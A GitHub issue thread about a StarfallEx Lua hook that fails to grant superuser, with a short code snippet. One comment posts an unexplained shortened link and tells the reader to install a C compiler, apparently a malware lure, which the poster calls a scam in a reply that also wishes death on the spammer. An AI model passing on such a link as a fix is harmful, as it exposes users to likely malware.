### ISSUE TITLE
StarfallCanSuperUser hook not working

### ISSUE THREAD

**Issue by Astralcircle** [thegrb93/StarfallEx#1855]
Code:
`hook.Add("StarfallCanSuperUser", "Demo", function(ply) 
return true 
end)`

Result:
![image](https://github.com/user-attachments/assets/20f6f66c-fba8-45ca-9123-fff9346e7328)

**Comment by AmjedKhaled165** [comment]
maybe this will help
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Astralcircle** [comment]
My stupidity, and I wish death on you, scammer.
